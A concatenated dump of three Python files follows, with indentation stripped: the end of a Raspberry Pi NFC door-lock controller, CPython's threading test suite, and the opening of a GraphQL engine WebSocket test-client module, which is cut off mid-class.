write_string = "not authed : " + id
os.chdir("/home/pi/project/kagisys_logic/")
file_ = open('not_auth.log', 'a')
file_.write(write_string)
file_.close()
def Dopen(self):
os.system("open_kagi")
self.colorWipe(self.strip, Color(20, 255, 35)) #green
self.oled.display([self.MODE, "OPEN"], ["en", "en"])
def Dlock(self):
os.system("lock_kagi")
self.colorWipe(self.strip, Color(255, 0, 0)) #red
self.oled.display([self.MODE, "LOCK"], ["en", "en"])
def led(self, toggle):
for i in range(8):
if(i%2==0):
GPIO.output(self.errLED, 0)
else:
GPIO.output(self.errLED, 1)
time.sleep(0.5)
if 7 <= datetime.now().hour <20: # 7時~20時の間のみ点灯
if toggle == "lock":
GPIO.output(self.errLED, 1)
else:
GPIO.output(self.errLED, 0)
else:
GPIO.output(self.errLED, 0)
def colorWipe(self, strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(wait_ms/1000.0)
if __name__ == '__main__':
NFC_Kagisys()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, strip_python_stderr, import_module
from test.script_helper import assert_python_ok
import random
import re
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import _testcapi
import time
import unittest
import weakref
import os
from test.script_helper import assert_python_ok, assert_python_failure
import subprocess
from test import lock_tests
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, stopped -?\d+\)>',
repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertTrue(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertFalse('daemon' in repr(t))
t.daemon = True
self.assertTrue('daemon' in repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertTrue(t._tstate_lock is None)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
def test_locals_at_exit(self):
# Issue #19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "atexit"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'atexit'")
def test_warnings_at_exit(self):
# Issue #19466: try to call most destructors at Python shutdown before
# destroying Python thread states
filename = __file__
rc, out, err = assert_python_ok("-Wd", "-c", """if 1:
import time
import threading
def open_sleep():
# a warning will be emitted when the open file will be
# destroyed (without being explicitly closed) while the daemon
# thread is destroyed
fileobj = open(%a, 'rb')
start_event.set()
time.sleep(60.0)
start_event = threading.Event()
thread = threading.Thread(target=open_sleep)
thread.daemon = True
thread.start()
# wait until the thread started
start_event.wait()
""" % filename)
self.assertRegex(err.rstrip(),
b"^sys:1: ResourceWarning: unclosed file ")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
import warnings
# ignore "unclosed file ..." warnings
warnings.filterwarnings('ignore', '', ResourceWarning)
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
if __name__ == "__main__":
unittest.main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
# NOTE: use this to generate a GraphQL client that uses the `Apollo`(subscription-transport-ws) sub-protocol
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
# NOTE: use this to generate a GraphQL client that uses the `graphql-ws` sub-protocol
class GraphQLWSClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def get_queue(self):
return self.ws_queue.queue
def clear_queue(self):
self.ws_queue.queue.clear()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close, subprotocols=["graphql-transport-ws"])
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
print("HELLO", self.ws_active_query_ids)
return self.ws_id_query_queues[query_id].get(timeout=timeout)
